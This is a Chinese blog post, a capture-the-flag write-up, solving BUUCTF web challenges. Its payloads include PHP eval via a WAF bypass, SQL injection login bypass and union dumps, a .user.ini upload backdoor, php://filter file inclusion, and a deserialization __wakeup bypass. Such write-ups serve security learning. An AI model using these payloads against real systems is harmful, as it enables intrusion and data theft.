<!DOCTYPE html>
<html lang="zh-CN">





<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/newblog/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/newblog/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content>
  <meta name="author" content="chenxiyuan">
  <meta name="keywords" content>
  <title>BUUCTF web writeup(三) ~ 晨曦远的博客</title>

  <link rel="stylesheet" href="/newblog/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/newblog/lib/bootstrap/css/bootstrap.min.css">
<link rel="stylesheet" href="/newblog/lib/mdbootstrap/css/mdb.min.css">
<link rel="stylesheet" href="/newblog/lib/github-markdown/github-markdown.min.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">


  <link rel="stylesheet" href="/newblog/lib/prettify/tomorrow-night-eighties.min.css">

<link rel="stylesheet" href="/newblog/css/main.css">


  <link rel="stylesheet" href="/newblog/lib/fancybox/jquery.fancybox.min.css">


</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/newblog/">&nbsp;<strong>晨曦远的博客</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/newblog/">首页</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/newblog/archives/">归档</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/newblog/categories/">分类</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/newblog/tags/">标签</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/newblog/about/">关于</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/newblog/links/">友链</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" false
         style="background: url('/newblog/img/wenzhang.jpg')no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              <br>
              
                <p class="mt-3">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>&nbsp;
                  星期日, 四月 12日 2020, 2:00 下午
                </p>
              

              <p>
                
                  
                  &nbsp;<i class="far fa-chart-bar"></i>
                  <span class="post-count">
                    1.3k 字
                  </span>&nbsp;
                

                
                  
                  &nbsp;<i class="far fa-clock"></i>
                  <span class="post-count">
                      6 分钟
                  </span>&nbsp;
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  &nbsp;<i class="far fa-eye" aria-hidden="true"></i>&nbsp;
                  <span id="busuanzi_container_page_pv">
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>&nbsp;
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto" id="post">
          <div class="markdown-body">
            <h2 id="RoarCTF-2019-Easy-Calc"><a href="#RoarCTF-2019-Easy-Calc" class="headerlink" title="[RoarCTF 2019]Easy Calc"></a>[RoarCTF 2019]Easy Calc</h2><p>题目是一个计算器，F12看到上了waf，去看看calc.php内容</p>
<pre><code class="php">&lt;?php
error_reporting(0);
if(!isset($_GET[&#39;num&#39;])){
    show_source(__FILE__);
}else{
        $str = $_GET[&#39;num&#39;];
        $blacklist = [&#39; &#39;, &#39;\t&#39;, &#39;\r&#39;, &#39;\n&#39;,&#39;\&#39;&#39;, &#39;&quot;&#39;, &#39;`&#39;, &#39;\[&#39;, &#39;\]&#39;,&#39;\$&#39;,&#39;\\&#39;,&#39;\^&#39;];
        foreach ($blacklist as $blackitem) {
                if (preg_match(&#39;/&#39; . $blackitem . &#39;/m&#39;, $str)) {
                        die(&quot;what are you want to do?&quot;);
                }
        }
        eval(&#39;echo &#39;.$str.&#39;;&#39;);
}
?&gt;
</code></pre>
<p>知识点:当php进行解析的时候，如果变量前面有空格，会去掉前面的空格再解析，那么我们就可以利用这个特点绕过waf。因为waf只是限制了<code>num</code>，分辨不出<code>num</code></p>
<pre><code>用chr转化成ascll码进行绕过
payload:calc.php?%20num=1;var_dump(scandir(chr(47)));
1array(24) { [0]=&gt; string(1) &quot;.&quot; [1]=&gt; string(2) &quot;..&quot; [2]=&gt; string(10) &quot;.dockerenv&quot; [3]=&gt; string(3) &quot;bin&quot; [4]=&gt; string(4) &quot;boot&quot; [5]=&gt; string(3) &quot;dev&quot; [6]=&gt; string(3) &quot;etc&quot; [7]=&gt; string(5) &quot;f1agg&quot; [8]=&gt; string(4) &quot;home&quot; [9]=&gt; string(3) &quot;lib&quot; [10]=&gt; string(5) &quot;lib64&quot; [11]=&gt; string(5) &quot;media&quot; [12]=&gt; string(3) &quot;mnt&quot; [13]=&gt; string(3) &quot;opt&quot; [14]=&gt; string(4) &quot;proc&quot; [15]=&gt; string(4) &quot;root&quot; [16]=&gt; string(3) &quot;run&quot; [17]=&gt; string(4) &quot;sbin&quot; [18]=&gt; string(3) &quot;srv&quot; [19]=&gt; string(8) &quot;start.sh&quot; [20]=&gt; string(3) &quot;sys&quot; [21]=&gt; string(3) &quot;tmp&quot; [22]=&gt; string(3) &quot;usr&quot; [23]=&gt; string(3) &quot;var&quot; }
payload:calc.php?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));
</code></pre><h2 id="极客大挑战-2019-EasySQL"><a href="#极客大挑战-2019-EasySQL" class="headerlink" title="[极客大挑战 2019]EasySQL"></a>[极客大挑战 2019]EasySQL</h2><p>简单，一个sql注入万能密码。</p>
<pre><code>payload:username=admin+%27+--%2B&amp;password=%27123
</code></pre><h2 id="SUCTF-2019-CheckIn"><a href="#SUCTF-2019-CheckIn" class="headerlink" title="[SUCTF 2019]CheckIn"></a>[SUCTF 2019]CheckIn</h2><p>通过看大佬的wp学到了<code>.user.ini</code>的用法。<code>.user.ini</code>实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。<br>利用<code>auto_prepend_file</code>指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。这样就可以加载后门了。<br>上传的图片类型检测，可以通过hex填图片类型的头通过。<code>&lt;?</code>在黑名单里，可以通过javascript调用php执行。<br><img src="http://120.26.91.51:4001/uploads/big/29a0cb283867fe7248eec659d66e1ab1.png" srcset="/newblog/img/loading.gif" alt="图片"></p>
<pre><code>payload:/uploads/48cd8b43081896fbd0931d204f947663/index.php?cxy=var_dump(scandir(&quot;/&quot;));
/uploads/48cd8b43081896fbd0931d204f947663/index.php?cxy=var_dump(file_get_contents(&quot;/flag&quot;));
</code></pre><h2 id="极客大挑战-2019-Secret-File"><a href="#极客大挑战-2019-Secret-File" class="headerlink" title="[极客大挑战 2019]Secret File"></a>[极客大挑战 2019]Secret File</h2><p>打开F12看到Archive_room.php，访问后点击secret发现查阅结束，打开burp拦截可以看到secr3t.php，访问得到</p>
<pre><code>&lt;html&gt;
    &lt;title&gt;secret&lt;/title&gt;
    &lt;meta charset=&quot;UTF-8&quot;&gt;
&lt;?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET[&#39;file&#39;];
    if(strstr($file,&quot;../&quot;)||stristr($file, &quot;tp&quot;)||stristr($file,&quot;input&quot;)||stristr($file,&quot;data&quot;)){
        echo &quot;Oh no!&quot;;
        exit();
    }
    include($file); 
//flag放在了flag.php里
?&gt;
&lt;/html&gt;
</code></pre><p>明显的文件包含+php伪协议。构造payload</p>
<pre><code>secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
</code></pre><p>base64解码后得到源码，里面有flag。</p>
<h2 id="极客大挑战-2019-PHP"><a href="#极客大挑战-2019-PHP" class="headerlink" title="[极客大挑战 2019]PHP"></a>[极客大挑战 2019]PHP</h2><p>打开提示有备份网站的习惯，直接访问<a href="http://www.zip成功下载到备份。查看源码发现是一道php反序列化的题" target="_blank" rel="noopener">www.zip成功下载到备份。查看源码发现是一道php反序列化的题</a></p>
<pre><code class="php">&lt;?php
include &#39;flag.php&#39;;


error_reporting(0);


class Name{
    private $username = &#39;nonono&#39;;
    private $password = &#39;yesyes&#39;;

    public function __construct($username,$password){
        $this-&gt;username = $username;
        $this-&gt;password = $password;
    }

    function __wakeup(){
        $this-&gt;username = &#39;guest&#39;;
    }

    function __destruct(){
        if ($this-&gt;password != 100) {
            echo &quot;&lt;/br&gt;NO!!!hacker!!!&lt;/br&gt;&quot;;
            echo &quot;You name is: &quot;;
            echo $this-&gt;username;echo &quot;&lt;/br&gt;&quot;;
            echo &quot;You password is: &quot;;
            echo $this-&gt;password;echo &quot;&lt;/br&gt;&quot;;
            die();
        }
        if ($this-&gt;username === &#39;admin&#39;) {
            global $flag;
            echo $flag;
        }else{
            echo &quot;&lt;/br&gt;hello my friend~~&lt;/br&gt;sorry i can&#39;t give you the flag!&quot;;
            die();


        }
    }
}
?&gt;
</code></pre>
<p>通过<code>__destruct</code>来<code>echo $flag</code>,满足条件两个条件就行。</p>
<pre><code>$a = new Name(&#39;admin&#39;,100);
$b=serialize($a);
echo $b;
</code></pre><p>serialize() 函数会检查类中是否存在一个魔术方法<code>__sleep()</code>。如果存在，该方法会先被调用，然后才执行序列化操作。与之相反，unserialize() 会检查是否存在一个<code>__wakeup()</code>方法。如果存在，则会先调用<code>__wakeup</code>方法，预先准备对象需要的资源。<br>所以这里需要修改Object后的数字来绕过魔术方法，也是一个比较常见的知识点。</p>
<pre><code>O:4:&quot;Name&quot;:2:{s:14:&quot;Nameusername&quot;;s:5:&quot;admin&quot;;s:14:&quot;Namepassword&quot;;i:100;}
</code></pre><p>修改为</p>
<pre><code>O:4:&quot;Name&quot;:3:{s:14:&quot;%00Name%00username&quot;;s:5:&quot;admin&quot;;s:14:&quot;%00Name%00password&quot;;i:100;}
</code></pre><p>这里的%00是因为私有变量序列化后会产生\x00，复制以后就丢失了，在浏览器上自己补充上%00.</p>
<pre><code>payload:index.php?select=O:4:&quot;Name&quot;:3:{s:14:&quot;%00Name%00username&quot;;s:5:&quot;admin&quot;;s:14:&quot;%00Name%00password&quot;;i:100;}
</code></pre><h2 id="极客大挑战-2019-LoveSQL"><a href="#极客大挑战-2019-LoveSQL" class="headerlink" title="[极客大挑战 2019]LoveSQL"></a>[极客大挑战 2019]LoveSQL</h2><p>联合注入，测试字段，发现是3个，有回显，直接爆库爆表爆列查询。payload:</p>
<pre><code>http://fb22b7cd-389b-40ea-913f-020616bf3b1b.node3.buuoj.cn/check.php?username=1%27%20union%20select%201,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23&amp;password=1
http://fb22b7cd-389b-40ea-913f-020616bf3b1b.node3.buuoj.cn/check.php?username=1%27%20union%20select%201,2,group_concat(column_name) from information_schema.columns where table_name=&#39;l0ve1ysq1&#39; %23&amp;password=1
http://fb22b7cd-389b-40ea-913f-020616bf3b1b.node3.buuoj.cn/check.php?username=1%27%20union%20select%201,2,group_concat(password) from l0ve1ysq1 %23&amp;password=1
</code></pre>
            <hr>
          </div>
          <br>
          <div>
            <p>
            
              <span>
                <i class="iconfont icon-inbox"></i>
                
                  <a class="hover-with-bg" href="/categories/web">web</a>
                  &nbsp;
                
              </span>&nbsp;&nbsp;
            
            
              <span>
                <i class="iconfont icon-tag"></i>
                
                  <a class="hover-with-bg" href="/tags/web">web</a>
                
              </span>
            
            </p>
            
              <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
            
          </div>
        </div>
      </div>
    </div>
    <div class="d-none d-lg-block col-lg-2 toc-container">
      
  <div id="toc">
    <p class="h4"><i class="far fa-list-alt"></i>&nbsp;目录</p>
    <div id="tocbot"></div>
  </div>

    </div>
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  <footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    <br>

    
  
    <!-- 不蒜子统计PV -->
    
    &nbsp;<span id="busuanzi_container_site_pv"></span>总访问量 
          <span id="busuanzi_value_site_pv"></span> 次&nbsp;
  
  
    <!-- 不蒜子统计UV -->
    
    &nbsp;<span id="busuanzi_container_site_uv"></span>总访客数 
            <span id="busuanzi_value_site_uv"></span> 人&nbsp;
  
  <br>



    


    <!-- cnzz Analytics icon -->
    

  </div>
</footer>

<!-- SCRIPTS -->
<script src="/newblog/lib/jquery/jquery.min.js" ></script>
<script src="/newblog/lib/popper/popper.min.js" ></script>
<script src="/newblog/lib/bootstrap/js/bootstrap.min.js" ></script>
<script src="/newblog/lib/mdbootstrap/js/mdb.min.js" ></script>
<script src="/newblog/js/main.js" ></script>


  <script src="/newblog/js/lazyload.js" ></script>



  
    <script src="/newblog/lib/tocbot/tocbot.min.js" ></script>
  
  <script src="/newblog/js/post.js" ></script>



  <script src="/newblog/lib/smoothscroll/SmoothScroll.min.js" ></script>



  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>


<!-- Plugins -->


  

  

  

  

  <!-- cnzz Analytics -->
  



  <script src="/newblog/lib/prettify/prettify.min.js" ></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script src="/newblog/lib/typed/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "BUUCTF web writeup(三)&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="/newblog/lib/anchor/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "false",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/newblog/js/local-search.js" ></script>
  <script>
    var path = "/newblog/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="/newblog/lib/fancybox/jquery.fancybox.min.js" ></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
